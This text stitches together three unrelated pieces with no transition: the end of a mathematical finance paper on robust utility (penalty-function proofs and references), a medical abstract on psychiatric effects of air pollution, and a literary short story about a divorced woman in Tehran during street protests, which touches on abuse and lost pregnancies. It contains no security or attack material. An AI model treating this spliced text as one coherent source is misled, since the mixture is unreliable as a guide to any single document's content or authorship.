t\}}Z_t^{Q'}+Z_t^{Q'}\mathbf{1}_{\{\tau > t\}\cap A}+Z_t^{Q}\mathbf{1}_{\{\tau > t\}\cap A^c}+ \mathbf{1}_{A^c\cap \{\tau\leq t\}}Z_t^{Q} \\&=\mathbf{1}_AZ_t^{Q'}+\mathbf{1}_A^cZ_t^Q \\&=(Z^Q|\tau_A|Z^{Q'})_t. \end{split}$$ From the definition of $Z^Q|\tau_A|Z^{Q'}$, we have $Z^Q|\tau_A|Z^{Q'} \in L^1([0,T])$ and so $Z^Q|\tau_A|Z^{Q'}$ is an $\Fc$-martingale which implies $$\E_P[(Z^Q|\tau_A|Z^{Q'})_T]=\E_P[Z_0^{Q'}\mathbf{1}_A+Z_0^Q\mathbf{1}_{A^c}]=\mathbf{1}_A+\mathbf{1}_{A^c}=1.$$ It remains to show that $d(\bar{Q})<\infty$ where the density of $\bar{Q}$ is given by $Z^Q|\tau_A|Z^{Q'}.$ We have $$\begin{split} d(\bar{Q}|P)+\kappa&=\E_P[f(Z_T^{Q'}\mathbf{1}_A+Z_T^Q\mathbf{1}_{A^c})+\kappa] \\& = \E_P[\mathbf{1}_A(f(Z_T^{Q'})+\kappa)+\mathbf{1}_{A^c}(f(Z_T^Q)+\kappa)] \\& \leq \E_P[(f(Z_T^{Q'})+\kappa)+(f(Z_T^Q)+\kappa)] \\& \leq d(Q|P)+d(Q'|P)+2\kappa. \end{split}$$ The first inequality is deduced from assumption **(H2)**. Then $$d(\bar{Q}|P) \leq d(Q|P)+d(Q'|P)+\kappa< \infty.$$\ 3- Take $Z^Q$ and $Z^{Q'}$ in $\Dc$, we denote by $A$ the set $\{\omega ; Z^Q(\omega)=Z^{Q'}(\omega)\}$. It must be proven that $$c(\omega,Z^Q(\omega))=c(\omega,Z^{Q'}(\omega))$$ on $A$ $Q-$a.s and ${Q'}-$a.s respectively. ### Consistent time penalty case Space $\Dc^c $ is compatible, stable under bifurcation and cost function $c$ is coherent. \ 1. $\Dc^c $ is compatible: let $\eta \in \Dc, \tau \in \Sc$ and $\eta'\in \Dc^c(Q^\eta,\tau).$ Then, by definition of $ \Dc^c(Q^\eta, \tau) $ we have $ Q^\eta|_{\Fc_\tau} = Q^{\eta'}|_{\Fc_\tau}.$\ 2. $\Dc^c$ is stable under bifurcation: let again $\eta \in \Dc^c,\tau \in \Sc , A\in \Fc_\tau$ and $\eta'\in \Dc^c(Q^\eta,\tau).$ It must be checked that $\eta''=\eta|\tau_A|\eta':=\eta \mathbf{1}_A+\eta' \mathbf{1}_{A^c}$ remains in $\Dc^c. $ i.e. $E_{Q ^{\eta''}}[\dint_0^Th (\eta''_u) du] <+\infty $. Indeed, $$\begin{split} E_{Q^{\eta''}}[\int_0^Th(\eta''_u)du]&\leq E_{Q^{\eta''}}[\mathbf{1}_A\int_0^Th(\eta_u)du+\mathbf{1}_{A^c}\int_0^Th(\eta'_u)du] \\&=E_{P}[Z_T^{\eta''}\mathbf{1}_A\int_0^Th(\eta_u)du+Z_T^{\eta''}\mathbf{1}_{A^c}\int_0^Th(\eta'_u)du] \\&=E_{P}[Z_T^{\eta}\mathbf{1}_A\int_0^Th(\eta_u)du+Z_T^{\eta'}\mathbf{1}_{A^c}\int_0^Th(\eta'_u)du] \\&\leq E_{Q^\eta}[\int_0^Th(\eta_u)du]+E_{Q^{\eta'}}[\int_0^Th(\eta'_u)du]. \end{split}$$ The last inequality is deduced from the non negativity of $h$ and the second equality is deduced from the definition of $\eta'.$\ 3. The cost function $c$ is coherent: let $\eta$ and $\eta'$ in $\Dc^c:$ denote by $ A $ the set $\{\omega, \eta(\omega) = \eta'(\omega) \} $. It is obvious that $$c(\omega, \eta (\omega)) = c (\omega, \eta' (\omega))$$ $Q-a.s$ and $ {Q'}-a.s $ on $A$. For all $ \tau \in \Sc $ and $ Q^\eta \in \Qc^c_f $ , the random variable $J(\tau, Q^\eta) $ is in $ L^1(Q^\eta).$ By definition, we have $$J(\tau, Q^\eta) \leq \Gamma (\tau, Q^\eta) \leq \E_ {Q^\eta} [|c(.,Q^\eta)| | \Fc_\tau],$$ which implies that $$(J(\tau, Q^\eta))^+\leq \E_{Q ^\eta} [|c(.,Q^\eta)| | \Fc_\tau]$$ and so $ (J(\tau, Q^\eta))^+$ is $ Q^\eta $-integrable by Proposition \[prop3.1\].\ It remains to show that $(J(\tau, Q^\eta))^-$ is also $Q^\eta $-integrable.\ Fix $\eta'\in \Dc^c (Q^\eta, \tau).$ we have: $$\begin{split} \beta E_{Q^{\eta'}}[\dint_0^T \delta_s S_s^\delta (\int_0^s h(\eta'_u)du) ds + S_T^\delta \int_0^T h(\eta'_s)ds|\Fc_\tau]& \geq \beta E_{Q^{\eta'}} [S_T^\delta \int_\tau^T h(\eta'_s)ds|\Fc_\tau]\\& \geq \beta e^{-\|\delta \|_{\infty}T} \gamma_\tau (Q^{\eta'}). \end{split}$$ Moreover, since $0 \leq S^\delta \leq 1 $ and using Bayes’ formula, we have: $$\E_{Q^{\eta'}} [\Uc_{0,T}^\delta|\Fc_\tau]\geq -\E_{Q^{\eta'}} [R|\Fc_\tau] =-\frac{1}{Z_\tau^{\eta}} \E_P[Z_T^{\eta'} R|\Fc_\tau].$$\ Using the inequality (\[convexinequality\]) and Bayes’ formula, we get: $$\begin{split} \E_P[Z_T^{\eta'} R|\Fc_\tau] & \leq \frac{1}{\lambda} \E_P [Z_T^{\eta'}\log Z_T^{\eta'} +e^{-1} e^{\lambda R}|\Fc_\tau] \\ & = \frac {1}{\lambda} Z_\tau^{\eta'}\E_{Q^{\eta'}} [\log Z_T^{\eta'}|\Fc_\tau] + \frac {e^{-1}} {\lambda} \E_P [e^{\lambda R}|\Fc_\tau] \\ & = \frac {1}{\lambda} Z_\tau^{\eta'}\E_{Q^{\eta'}} [\int_0^T\eta'_udW_u-\frac{1}{2}\int_0^T|\eta'|^2_udu|\Fc_\tau] + \frac {e^{-1}} {\lambda} \E_P [e^{\lambda R}|\Fc_\tau] \\ & = \frac {1}{\lambda} Z_\tau^{\eta'}(\int_0^\tau\eta'_udW_u-\frac{1}{2}\int_0^\tau|\eta'|^2_udu+\E_{Q^{\eta'}} [\int_\tau^T\eta'_udW_u-\int_\tau^T|\eta'|^2_udu|\Fc_\tau] \\&+ \E_{Q^{\eta'}}[\frac{1}{2}\int_\tau^T|\eta'|^2_udu|\Fc_\tau])+\frac {e^{-1}} {\lambda} \E_P [e^{\lambda R}|\Fc_\tau]. \end{split}$$ By the Girsanov theorem the process $(\int_0^.\eta'_udW_u-\int_0^.|\eta'|^2_udu)$ is a local $Q^{\eta'}$- martingale and therefore $\E_{Q^{\eta'}} [\int_\tau^T\eta'_udW_u-\int_\tau^T|\eta'|^2_udu|\Fc_\tau]=0.$ Consequently, by using that $Z_\tau^{\eta'}=Z_\tau^{\eta}$, we have $$\begin{split} &\E_P[Z_T^{\eta'} R|\Fc_\tau] \leq \frac {1}{\lambda} Z_\tau^{\eta}\Big(\int_0^\tau\eta'_udW_u-\frac{1}{2}\int_0^\tau|\eta'|^2_udu +\E_{Q^{\eta'}}[\frac{1}{2}\int_\tau^T|\eta'|^2_udu|\Fc_\tau]\Big)+\frac {e^{-1}} {\lambda} \E_P [e^{\lambda R}|\Fc_\tau] \\& =\frac {1}{\lambda} Z_\tau^{\eta}\Big(\int_0^\tau\eta_udW_u-\frac{1}{2}\int_0^\tau|\eta|^2_udu +\E_{Q^{\eta'}}[\frac{1}{2}\int_\tau^T|\eta'|^2_udu|\Fc_\tau]\Big)+\frac {e^{-1}} {\lambda} \E_P [e^{\lambda R}|\Fc_\tau] \\ & \leq \frac {1}{\lambda} Z_\tau^{\eta}\Big(\int_0^\tau\eta_udW_u-\frac{1}{2}\int_0^\tau|\eta|^2_udu +\E_{Q^{\eta'}}[\frac{1}{2}\int_\tau^T\frac{h(\eta'_u)+\kappa_2}{\kappa_1}du|\Fc_\tau]\Big)+\frac {e^{-1}} {\lambda} \E_P [e^{\lambda R}|\Fc_\tau]. \end{split}$$ Thus, we have $$\begin{split} \E_{Q^{\eta'}} [\Uc_{0,T}^\delta|\Fc_\tau]&\geq -\frac {1}{\lambda} \Big(\int_0^\tau\eta_udW_u-\frac{1}{2}\int_0^\tau|\eta|^2_udu +\E_{Q^{\eta'}}[\frac{1}{2}\int_\tau^T\frac{h(\eta'_u)+\kappa_2}{\kappa_1}du|\Fc_\tau]\Big)\\&-\frac {e^{-1}} {\lambda}\frac{1}{Z_\tau^{\eta}} \E_P [e^{\lambda R}|\Fc_\tau], \end{split}$$ and consequently $$\begin{split} \Gamma(\tau,Q^{\eta'})\geq &\beta e^{-\|\delta \|_{\infty}T} \gamma_\tau (Q^{\eta'})-\frac{1}{\lambda}\E_{Q^{\eta'}}[\frac{1}{2}\int_\tau^T\frac{h(\eta'_u)+\kappa_2}{\kappa_1}du|\Fc_\tau] \\&-\frac {1}{\lambda} (\int_0^\tau\eta_udW_u-\frac{1}{2}\int_0^\tau|\eta|^2_udu) -\frac {e^{-1}} {\lambda}\frac{1}{Z_\tau^{\eta}} \E_P [e^{\lambda R}|\Fc_\tau]. \\&=(\beta e^{-\|\delta \|_{\infty}T}-\frac{1}{2\lambda\kappa_1}) \gamma_\tau (Q^{\eta'}) \\&-\frac {1}{\lambda} (\int_0^\tau\eta_udW_u-\frac{1}{2}\int_0^\tau|\eta|^2_udu +\frac{T\kappa_2}{2\kappa_1})-\frac {e^{-1}} {\lambda}\frac{1}{Z_\tau^{\eta}} \E_P [e^{\lambda R}|\Fc_\tau]. \end{split}$$ Let $ \lambda > 0 $ such that $\beta e^{-\|\delta \|_{\infty}T}-\frac{1}{2\lambda\kappa_1}=0 $ then $$\Gamma(\tau,Q^{\eta'})\geq -\frac {1}{\lambda} (\vert\int_0^\tau\eta_udW_u \vert+\frac{1}{2}\int_0^\tau|\eta|^2_udu +\frac{T\kappa_2}{2\kappa_1})-\frac {e^{-1}} {\lambda}\frac{1}{Z_\tau^{\eta}} \E_P [e^{\lambda R}|\Fc_\tau]:=-B.$$ Since the random variable $B$ is nonnegative and does not depend on $Q^{\eta'}$, we conclude that $J(\tau,Q)\geq -B.$ So that $J(\tau,Q)^-\leq B.$\ It thus remains to be shown that $B\in L^1(Q^\eta).$\ Under assumptions **(A1)-(A’2)**, we have $$E_{Q^\eta}[\frac{1}{Z_\tau^{\eta}} \E_P [e^{\lambda R}|\Fc_\tau]]=E_P[\E_P [e^{\lambda R}|\Fc_\tau]]=\E_P [e^{\lambda R}]<+\infty.$$ Moreover $$E_{Q^\eta}[|\int_0^\tau\eta_udW_u|+\frac{1}{2}\int_0^\tau|\eta|^2_udu]<+\infty.$$ Hence, $B\in L^1(Q^\eta).$ [10]{} Briand Ph., Hu, Y. Quadratic BSDE with convex generators and unbounded terminal conditions. Probab. Theory Related Fields. 141 (2008), 543-567. Cox, J. , Huang, C. Optimal consumption and portfolio policies when asset prices follow a diffusion process. , 49:33–83, 1989. Csiszar, I. Information-type measures of difference of probability distributions and indirect. , 2:299-318, 1967. Jouini E, Schachermayer W, and Touzi N. Law Invariant Risk Measures have the Fatou Property. Delbaen F., Peng, S. and Rosazza Gianin, E. Representation of the penalty term of dynamic concave utilities.Finance Stoch. 14 449-472, 2010. Delbaen F., Hu, Y., Bao Backward stochastic differential equations with superquadratic growth Probab. Theory Related Fields. 150 (2011), 145-192. Gilboa, I., Schmeidler D. Maximin expected utility with a non-unique prior. , 18:141–153, 1989. Barrieu, P., El Karoui, N.. , chapter Pricing, Hedging, and Designing Derivatives with Risk Measures, pages 77–146. Princeton University Press, 2009. Bordigoni, G., Matoussi A., Schweizer, M. A stochastic control approach to a robust utility maximization problem. , pp. 125-151, 2007. El Karoui, N. Les aspects probabilistes du contrôle stochastique. , (876):73–238, 1981. Frittelli, M. The minimal entropy martingale measure and the valuation problem in incomplete markets Mathematical Finance, Vol. 10/1 pp. 39-52. Hansen, L., Sargent, T.. Robust control and model uncertainty, Amer. Econom. Rev. 91 (2001) 60.66. 2001. Karatzas, I. , Lehoczky, J.P., Shreve, S., Xu, G. Martingale and duality methods for utility maximization in an incomplete market. , 29:702–730, 1991. Laeven, R.J.A., Stadje, M.A. Robust Portfolio choice and indifference valuation. *Prepint, ISSSN*, 1315-2355 (2012), Maccheroni, F., Marinacci, M., Rustichini, A. Ambiguity aversion,robustness,and the variational representation of preferences. , 74(6):1447–1498, 2006. Merton, R. Optimum consumption and portfolio rules in a continuous-time model. , 3:373–413, 1971. Schied, A. Robust optimal control for a consumption-investment problem. , 67(1), 2008. Schmeidler, D. Subjective probability and expected utility without additivity. , 57:571–587, 1989. Schroder, M. , Skiadas, C. Optimal lifetime consumption-potfolio strategies under trading constraints and generalized recursive preferences. , 108:155–202, 2003. Skiadas, C. Robust control and recursive utility. , 7:475–489, 2003.
Psychiatric aspects of air pollution. Psychological and toxic effects of air pollution can lead to psychiatric symptoms, including anxiety and changes in mood, cognition, and behavior. Increased levels of some air pollutants are accompanied by an increase in psychiatric admissions and emergency calls and, in some studies, by changes in behavior and a reduction in psychological well-being. Numerous toxic pollutants interfere with the development and adult functioning of the nervous system. Manifestations are often insidious or delayed, but they can provide a more sensitive indicator of toxic effects than cancer rates or mortality data. Other medical effects of air pollution, such as asthma, can indirectly affect psychological health. The sick building syndrome and multiple chemical sensitivity are conditions with toxicologic and psychiatric aspects. Psychosocial stress can cause symptoms similar to those of organic mental disorders. Reactions to stress depend on cultural, individual, and situational variables. We must understand these factors to be able to alleviate and prevent the consequences of environmental trauma. Expanded research is recommended in three main areas: (1) how people perceive and cope with environmental health risks, (2) the effects of air pollution on behavior and neuropsychological functioning, and (3) neurotoxicologic evaluation of air pollutants with both behavioral and in vitro studies.
[ fiction ] I am in Tehran. I escaped Javad and the slipperiness of the seaside for the firmness of the mountains. Tehran boils over with blood and something approaching hope. Here, my misery begins to evaporate in the streets amid the green banners and effervescent youth. I arrive at my aunt's house as the sun cascades into the tops of apartment buildings and commercial towers. I've never seen a skyline so crowded with dust and steel. A young man named Omid stands at the entrance to my aunt's apartment building. I remember him as the boy who hovered at the periphery of my childhood summers here, cast out and alone. In those days, Hossein, the oldest child from my aunt's building and the undisputed leader in the courtyard, spent much of his time calling Omid names and throwing garbage at him. Omid never fought back or said much. He'd hang around quietly watching the children play until Hossein showed up, then run away down an alley and disappear until the next afternoon. I usually played with my dolls near the fountain, giving them lessons in the alphabet or leading them in song. Once Hossein turned his menacing attention on me and took one of my prized dolls, dangling her over my head as I struggled to reach her. Omid pushed Hossein to the ground and held him there long enough to whisper something in his ear. Omid retrieved my toy and Hossein never bothered either one of us after that. I might have been impressed but instead I was embarrassed to be associated with Omid and angry that his unclean hands had somehow tainted my doll. I refused to take it back. Instead, I thought of the word I'd heard my aunt call Omid and his family when they weren't around. "Najis! Get away from me!" He looked at me and I recognized the shame in his face. I was satisfied with my power in that moment. Then he punched me in the nose. It was the first time anyone had hit me and the last time I truly deserved it. Entering the building now, Omid's eyes meet mine and they are the same pristine green I remember. My shoulder brushes against his chest as I try to pass him in the doorway. "Hello, Abaan," he says, as the smell of jasmine wafts through the corridor. I find that I have no voice to respond to him with. I offer a smile and hurry away, surprised by the quickening of my heart. That night, I dream about giving birth to green-colored jasmine blossoms that grow in a garden, untouched by time and unburdened by history. In the morning, I set about finding a job. My prospects are bleak. The economy is a mess. The women who interview me at various government ministries criticize the angle of my headscarf. They'd rather see me in a chador. My headscarf is government approved, yet it still connotes a liberalness they are wary of, as though they can see the green of my veins through the black of the fabric. I come home in time for lunch, disheartened in the oppressing heat. My aunt's apartment is small. There is little furniture, but what she has is neatly organized along the walls to optimize the space in the middle. There are only two bedrooms, each just large enough to hold a bed and a small desk. There is one bathroom and a tidy kitchen. Her husband died years ago and yet there is a sense that he'll be back any moment. She has left his things in their places. His chair near the window with the indented cushion glows with a fine layer of dust. The small table next to the chair still holds his glasses and a volume of poetry, which he consulted in the evenings as he sipped bootleg wine. His overcoat stands sentry at the door, and a well-worn pair of house slippers look warm and inviting though they must be cold. My aunt takes my handbag and shuffles me into the living room -- more like a glorified closet -- and admonishes me to stay with her. "I need a young person like you. I need someone to help with the loneliness," she says. I wonder if there is space for me in this box with my aunt and her husband's ghost, and I privately resolve to find separate accommodations once I am able to afford them. Her daughters left last year for universities in Europe and America. Her son is married and expecting his first child. My aunt complains about his decision to no longer live with her. "But there is no room, Khaleh. You can't take it personally." I try to be gentle. "Yes, I know. But everything is changing, children are leaving their parents, old women are abused on the streets by the Basij, and I can't cook a simple meal without rationing my oil. What's next?" She looks at me as though I have the answers. I shrug. Later, as I lie in the narrow guest bed, I can hear her voice carry over the night sounds of moving traffic and street people from below. I can hear her recounting the details of her day to a man long dead. *** On my third day of job hunting I run into Omid in the courtyard on my way out of the building. I try not to meet his gaze but he stands slightly in my way. His chest is broad and I look up to meet his eyes and see the man he's grown into. "It doesn't look too bad," he says. Confused, I hesitate and before I can say anything he says, "Your nose. I was sure I'd broken it, but I see now that it's a decent nose, nothing spectacular, but certainly not as deformed as I feared, certainly not something that kept you from marrying well, though it seems it couldn't keep you married either." The sting of his knowing about my failed marriage doesn't bother me too much, but I immediately reach up to cover my nose protectively. "You are very rude," is all I can manage through the muffle of my hand. "I've been accused of worse." A new sadness rises in my chest. He seems to notice it and his demeanor softens. "Abaan, I'm sorry to hear about what has happened to you," he says and his hand touches mine, and the next long breath drawn is my own. "I'm on my way to the Azad, a newspaper where I work. They are looking for a secretary, in case you are interested." He doesn't wait for me to answer. He sets off down a crowded street, his shoulders rubbing against passersby, and I watch as he recedes into a sea of human bodies moving, constantly moving. I navigate my way to the paper later in the afternoon. Omid was right, they need a secretary, a person who will take notes and answer the phone and perhaps occasionally provide some journalistic insight to the madness unfolding in the city. The man who interviews me has beautiful hands and his eyes look straight into mine. I explain that while I've never worked before, I did attend a secretarial course in my hometown the year my parents thought I might never marry. He smiles, then worries aloud that occasionally there won't be funds to pay my wages and that, truly, they are looking for someone ideologically committed to the mission of the paper and who can weather the closures and reopenings and turmoil of running an independent press in Tehran. It isn't that I don't find their cause compelling, but I can't see myself as a street urchin clothed with nothing more than noble ideals. I need wages and the things wages provide. The editor nods sympathetically. As we talk, Omid brings in tea on a tarnished tray. I've never seen a tray so tarnished and it occurs to me, this little newspaper, this office, this small, smoke-filled room is populated by men alone, and men don't know how to properly keep silver from tarnishing. "Thank you for the tea, Omid," the editor says as Omid walks away. He turns to me. "Well, there is a lot of work that needs to be done if you want the job. It can get pretty chaotic around here and it is risky working for a newspaper like ours, which is considered occasionally subversive or revolutionary. You'll need to keep your wits about you and your headscarf tied correctly. We don't want unnecessary attention." "I gave up wearing the chador when I left Astara." I tug on the loose ends of my state-approved headscarf. I want to remind him that I am not interested in a job that only occasionally pays, but instead I collect my things. His smile remains unchanged as I make my way out of the office. Omid stands at the entrance smoking a cigarette. His eyes are large and expansive and there is a scar that is carved out from the corner of his left eye, like a question mark, that wasn't there when we were children. "Have you managed to make any friends since you arrived?" "I've been busy looking for work and looking after my elderly aunt." Omid offers a small laugh. "Abaan, she seemed fine before you came along. I'm sure she can bear some hours of the evening alone while you live a little. No?" I smile, thinking about the freedom of an evening on my own terms. "Yes, it would be nice." I say, and I am suddenly aware of my nose in his line of vision. "You never met my little sister. She's a writer and will be reading a piece from her collection of poetry at an underground literary gathering." He scribbles the address and time on a piece of paper and presses it into my palm. "This will be a nice way to get to know some people," he says. "Thank you," I say, and my nose feels huge and heavy on my face as I speak. Omid reaches out and touches my arm lightly. "Be cautious when you come tonight. We aren't doing anything wrong, but still we'd rather not draw attention. If you can, memorize the address and throw the paper away." "Why can't you take me yourself?" "That is simple. I don't want to be seen with you." I give him the finger as he walks back into the office. The door closes and I look at my palm and at the edges of the torn page, delicate and white and fragile against the brown of my skin. I walk towards home on borrowed joy and get lost almost immediately. The streets crowd into each other and there is the sound of chanting from many directions. I come upon a crowd of young men standing at the corner. Some of them are on scooters. Others stand in groups of two or three. They look as though they are waiting for something. They are young, but they look menacing, and I try not to catch their attention as I silently go past towards a shop. "Stop." I slow down but continue to walk, hoping it's not me that is being told to stop. I turn and one of the young men runs towards me. I see now that he is holding a club. "Sister, that area is off limits. You aren't allowed to go in that direction. Turn around and go back home." The other men stand at a distance and out of earshot but looking at us. "But my home is in that direction." I don't look into his eyes. His chin is covered in thin, new hair, and his voice rings with the tin of eternal youth. I remember Javad, as he was when we were young and newly married. Like this boy, he was convinced of his power, his infallibility. "Sister, can you call your father or brother to come escort you home?" "I can not do that, Brother. My father died last year. I don't have any brothers." "Then a husband?" I shake my head no. I notice that he puffs his chest out some, as if to indicate his eligibility. "I can call my aunt, but Brother, if you'll let me pass I can be home soon, instead of standing here with you on the street." He sighs. The other young men head in our direction. Panic prickles along my spine. I don't want to be further detained or questioned. "No one is allowed to cross here. Those are my orders. And I would personally be concerned for the well-being of a good Sister such as yourself among these rough immoral demonstrators." He lowers his voice. "Yesterday they shot a young woman just like you." "I understand, Brother. Thank you for your concern. My intent isn't to cause you trouble. I'll just go back in the direction I came." I try to walk back but the others are upon us. "What is the delay here?" says a blue-eyed man. He stands straight, but even so is shorter than me and wide. His stomach bulges at the waist of his pants and the bones of his wrists are mealy knobs under rolls of fat. "Sir, our Sister has no secure means of getting home." "If I may interrupt," I begin and the others look at me as though they are surprised I speak. "I can easily make my way home in the direction I came. There are no problems and I must not delay you any longer from your vigil." The blue-eyed man blocks my path. His eyes narrow. "Sister, where are you coming from?" "I've just left the market." I pause. "And now I need to get home." The scrap of paper in my hand wilts. "You aren't carrying any shopping bags. What did you purchase?" "I didn't find what I wanted." The men look away from me and towards the blue-eyed man, wondering how he'll counter. "But which market did you visit? There are no markets in that direction." Just as I am about to answer, I hear someone yelling my name. I turn back and see it is Omid. "Abaan, sister jan, where have you been? We've been waiting for you at home, you were due back hours ago." Omid has a pained look. He turns towards the blue-eyed man. "Sir, thank you for stopping her. My sister has a habit of getting lost and we've been terribly concerned given the climate around here." "Come on now, sister, let's get home. Father is very sore with you." Omid gently leads me away, and the blue-eyed man huffs his approval. I look at the young man. His face doesn't look as young now and his eyes are great big saucers of knowing, yet he says nothing. "How'd you get into that mess?" Omid whispers as we turn down an alley. "I was just walking and this guy suddenly stopped me and started asking me where I was going." "Well, I'm glad I saw you. Who knows what they would have done to you?" "I would have been just fine getting out of it alone," my voice trails off. We walk quietly for a time down a cool alleyway. Omid stops in front of a metal gate along the concrete wall. A stray cat with matted hair crosses our path, and trash and dust swirls around us as a passing breeze cuts through the passage. "This is my friend's house. You are welcome to come in and join us for tea. Or I can call a car to take you home. It is safer than walking." Omid touches my hand. When he looks at me I look away, but I want him to keep looking, to keep seeing me. "You can stay for dinner." "I should go home. My aunt will expect me soon." He nods. I want this to be the part where he kisses me tenderly, the way kisses were tender in the bootleg American movies I watched as a girl. Javad didn't like those movies. He'd fast forward over those parts to get to the sex scenes. "Okay, let me call a car for you, Abaan. It's safer, especially now that it is getting dark." I nod and give him the scrap of paper, the ink ruined from the sweat of my palms. At home I tell my aunt that I might have found a job. She says it's a pity. "Your husband should be looking after you, that brute. I told your mother not to marry you off to him. I told her my husband's nephew was more of a man for you. If you'd married him you'd have at least five children by now. Instead, look at you. Abandoned, childless, forced to work in a strange office among strangers. Waiting in vain for some pittance to start your life." Everyone knew about Javad's beatings. I returned to my parent's house plenty of times with broken noses or bruised ribs, and there wasn't much I could hide in our small family. But I didn't tell anyone about the babies. "It isn't a pittance. He'll pay the money because I know he wants to get remarried this year. He'll pay and I'll be able to take care of myself." "He won't pay you and he'll remarry this year too. Remember, he's saying you are infertile, and a judge might allow him to take another wife without your consent based on your infertility or just divorce you without having to pay the mehriyeh." My aunt sets the small table for our dinner. She prepares a salad with diced tomatoes and finely chopped raw onions. Over this she pours oil and vinegar and sprinkles of salt and pepper. She squeezes a lemon into the small bowl, and its juice pours through her tired hands causing her to wince as it burns the cracks in her knuckles. She catches the pulp and seeds and throws them away in a tiny waste can. When my uncle was alive, my aunt never worked outside the home. She looked after their children, kept her home tidy, cooked legendary meals. Now, in exchange for rent, she cares for the landlord's children three days a week. Occasionally, she helps at her cousin's vegetable stand in exchange for tomatoes or eggplants. Often, she relies on her son and what's left of her husband's pension from the Ministry of Education for the rest. I take the rice from the stovetop. It smells clean, and each puffed white grain looks like an un-bloomed jasmine blossom. The yogurt is already on the table, and when my aunt finally sits down, I serve her before putting a small portion of rice and yogurt and salad in my own plate. We eat in silence, and when we finish I insist that she go to bed while I clean up. She pulls herself up and sighs. The wrinkles around her eyes are pronounced, but the green of her irises shine through, illuminated by the florescent kitchen light. "Maybe it's a good thing, working in the world when you are young. Then you won't ever be like me. Forced to learn new ways when you are old." The evening is cool, but it isn't quiet like the seaside. Cars and motorcycles and pedestrians battle for hegemony in the streets, at the crosswalks. The shop windows are bright. There is an insistent buzz emanating form all corners of the city, a constant hum and pop, a low rumble below my feet. I walk quickly, taking careful note of my surroundings and street signs. For the reading, people have gathered in an apartment above a bakery. The room is full of women with their hair long and braided or short in a bob or curled and colored yellow. The men sip whiskey and I am offered a glass of wine. I don't see Omid, but a young woman approaches and introduces herself as his sister. "Omid told me to expect you." Her eyes are bright and they shine despite the dim lighting. "Welcome to my house. Please make yourself comfortable. We'll start soon." I take a seat near the window. Outside it is starting to rain, and flashes of lightning momentarily illuminate the emptying streets below. Somehow the darkness is darker after the lightness. Omid takes a seat next to me just as a quiet expectancy settles over everyone. We turn to the front of the room. There, near an old desk and in front of a commanding bookcase, is Omid's sister. She speaks. The sea is swirling, angry, hungry for some offering. Approaching the water, I let go of my chador. The breeze takes hold of this length of cloth, this cloak of our times, this garment of modesty, a humiliation as familiar as the smell of my own skin and casts it aside. The wind against my bare arms and legs. The act of letting go. I touch the edge of the water with my toes. I am engulfed in the rushing tide. It feels natural. The cold, the motions, and the way that the sea draws me closer to its centermost point. The sand breaks apart under my feet and there is nothing left to hold me upright. The icy coldness breaks the bond that cements my soul to my body and I begin an ascent into a precious mile of sky. I see my body glowing white beneath the laughing moon, float and bob and slip away. We are silent at the conclusion. Other writers and artists take turns performing. Some play music. Omid and I excuse ourselves during an interlude and go out onto the balcony. The rain has slowed and small drops ping and plop onto the metal awning above our heads. I learn then that Omid and his sister are Baha'i. The Islamic Republic of Iran officially considers members of the Baha'i faith to be infidels, and as such denies them many rights, including the right to a proper burial upon death. When his mother died Omid had to drive her lifeless body to the outskirts of the city in a borrowed car. There in the desolate plains and in the belly of unconsecrated earth, he laid her to rest after digging the hole himself. I touch his hands. They are cold, even in the sweltering warmth and wetness of the air. We stand together for a time exchanging sighs. When he asks me why I came to Tehran, I begin with my babies and the coldness of the earth in winter. I tell him how I can still feel the dirt under my nails and their bodies like air, light and fleeting, tucked into the ice and earth. "Javad would accuse me of betraying him if he knew, but each time it felt like an act of mercy." We look out across the sullen rooftops of the nighttime landscape. A sweet humming chant emanates in waves from all around us. Men and women and the high-pitched song of children calling out to a god of redemption. "Allah-o Akbar," they chant. "There can be no betrayal or mercy without love," Omid says. He whispers my name and pulls me into his arms. "Abaan," he says, "listen." And we listen to the chanting as it grows, as it comes near and travels far, and back to us again. We listen until the sun rises and casts its light across the concrete structures populating the horizon. *** The following week I take a job as a low-level clerk in a governmental aid office. I agree to wear a full-length chador and my boss, Kimia Khanoum, an elderly woman with red-rimmed eyes, takes it upon herself to salvage what is left of my soul. "Separated from your husband? God forbid you don't intend to continue in this state of affairs." Her voice is thick. "If you can't have children, give him the divorce so he can have a family." It sounds simple. Just let go of Javad. Let him have his way and his divorce so he can remarry without complications. When we first met, I didn't want to marry him. I didn't like the smell of the oil he used to slick back his hair. I found his talk of God at odds with the heavy gold band of his watch and the way he left the top buttons of his shirt open wide to expose the tuft of hair he'd carefully groomed on his chest. He came to our home each Friday before the afternoon prayers to court my family. My mother would fuss over preparing tea and serving fruit. After all, he was the first man to show an interest, since the last one I'd scared off the previous year. He wasn't educated, but his family owned a chain of jewelry stores that my mother was certain would provide some kind of a life. If she let me make lunch, I'd overcook the eggs into a leathery mess or add turmeric when the recipe called for tendrils of saffron. He ate heartily. He laughed too loud at my father's jokes and he looked at me with too much expectation. "I don't want to get married this year," I'd tell him each Friday. "I am a patient man, Abaan." I remember seeing a kind of longing in his eyes. I wanted to believe that it was about me, that he was longing for some partner to bear the beautiful chaos of life. I wanted to believe that our life together would be a cooperative effort, aimed at acquiring the things that made a person happy: a house to populate with children, a room to collect memories in, a man to trust with my life. I wanted to believe that I would have a measure of freedom as a wife that I wasn't allowed as a dutiful and unmarried daughter living in a small town along the sea with my aging parents. I imagined that Javad would be proud to send me to university, to allow me the pleasure, useless though it was, to study art and literature, so that one day, I could count myself as having accomplished something. To this end, I extracted declarations of support from him, promises that he would not prohibit me from pursuing an education. He agreed. He swore upon the heads of all of our future children that he would never keep me from getting an education, so long as it didn't interfere with the production of children. So long as I gave him children, I could go to school. Actually, the longing I saw in his eyes had been a singular longing for sex. It was the grand focus of our new life together, once we eventually married. He'd heard from his friends all the tawdry details of what delights married life would provide him. On our wedding night, he was gentle and kind, even a little scared. But then he began to want to do things that pushed my accommodating indifference to outright horror. I couldn't fathom how to execute his requests. Ultimately, he reasoned that if he couldn't act out his fantasies with a willing participant, he'd act them out with an unwilling one. I tried to let go of all the hope I'd accumulated in my foolish heart. I cooked to please him. I dressed to please him. I stopped asking about going to school to please him. I survived each evening to serve him hot tea each morning. I believed that one day he might learn to consider my desires as well as his own, but it never came to pass. Eventually, I stopped recognizing the chimera of my own reflection in the mirror. Our children remained nameless, and I populated the winter earth with their small bodies, bodies I purged from my own. I couldn't bear the prison of motherhood, alongside the prison of being Javad's wife. And there, in Javad's garden, the children stood sentry over the rage in my heart. I left Javad for the oblivion of a city life and he filed for divorce, though he refused to pay me the mehriyeh he agreed to in our wedding contract on the basis 